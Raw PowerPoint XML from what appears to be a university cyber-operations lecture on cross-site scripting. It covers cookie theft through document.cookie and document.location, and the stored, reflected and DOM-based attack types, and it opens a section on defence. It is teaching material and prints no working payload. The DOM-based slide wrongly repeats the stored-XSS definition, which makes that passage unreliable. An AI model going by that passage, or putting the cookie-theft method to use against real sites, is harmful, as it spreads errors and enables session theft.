              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Stealing cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="754380" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="411480" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>string used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to pass cookies to a server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> parameter, however, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>it is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>passed inline with a URL as defined in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="85000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIS4930/CIS5930 Practical Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operstions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Fundamentals 2020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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29</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981200"/>
            <a:ext cx="5943600" cy="231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8552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219200"/>
            <a:ext cx="8077200" cy="1374775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0" smtClean="0"/>
              <a:t>A.   SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0" smtClean="0"/>
              <a:t>tunneling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0"/>
              <a:t>and VPNs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2819400"/>
            <a:ext cx="6858000" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>ecure point-to-point connectivity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27552325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7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Categories of XSS attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="5400"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2895600"/>
            <a:ext cx="7620000" cy="3124200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Stored (persistent) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Reflected (non-persistent) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>DOM-based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144759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990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>(persistent) attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5232737"/>
            <a:ext cx="7848600" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected script is permanently stored on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server (in a database, a message forum, visitor log, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                       When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the script is retrieved.</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161" y="1600200"/>
            <a:ext cx="8313945"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5278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620000" cy="1493838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>(non-persistent) XSS</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3657600"/>
            <a:ext cx="7621672" cy="3016210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is reflected off the webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, such as an error message, search result, or a response to some or all of the input sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server as part of the request.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="2F2B20"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacks are delivered to clients via another route, such as an  email or on another website.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="2F2B20"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client is tricked into clicking on the malicious link,  submitting a special crafted form, or just browsing the malicious site,  then the injected code travels to the vulnerable website which  then reflects the attack back to the victim's browser.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="2F2B20"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser executes the code because it comes from a trusted server</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153400" cy="2286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1953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lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM based XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Document Object Model)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150728" y="3733800"/>
            <a:ext cx="8002672" cy="3016210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>he </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack payload is executed as a result of modifying the DOM  environment  in the client's browser, used by the original client side script,  so that the client side code runs in an unexpected manner.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="2F2B20"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if the HTTP page does not change itself, the client side code  contained  in the page executes differently due to malicious modifications in the DOM  environment.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="2F2B20"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacks can be described as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client side  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS  (as apposed to stored and reflected attacks that are  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>side).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The injected script is permanently stored on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server (in a database, a message forum, visitor log, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                              When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2F2B20"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the script is retrieved.</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71600"/>
            <a:ext cx="8305800"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241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Defending against XSS attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="7848600" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>client web browsers evolve, they incorporate an increasingly diverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>range of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functionalities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>common desktop applications extend their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>functionality to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>replicate or incorporate the functionality of these web browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a security flaw may be an HTML injection, and more specifically XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>opportunities for attackers to initiate attacks by exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>grow at an alarming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unfortunately, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>delivery methods are becoming so diverse that no single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>security solution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is available to prevent such attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="DFDCB7"/>
                </a:solidFill>
              </a:rPr>
